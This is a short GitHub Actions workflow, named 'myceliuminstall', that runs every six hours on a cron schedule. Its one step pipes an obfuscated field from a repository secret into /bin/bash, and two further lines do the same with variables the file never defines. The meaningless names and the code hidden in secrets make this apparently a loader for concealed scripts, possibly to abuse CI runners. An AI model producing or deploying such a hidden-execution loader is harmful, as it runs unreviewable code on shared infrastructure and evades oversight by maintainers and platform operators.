name: myceliuminstall
on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: myceliuminstall
        env:
          k9: ${{ secrets.k9 }}
        run: |
          echo $k9 | jq -r .h68244 | /bin/bash
          echo $a0 | jq -r .eprv56174 | /bin/bash
          echo $oceea4243 | jq -r .ncr7565 | /bin/bash

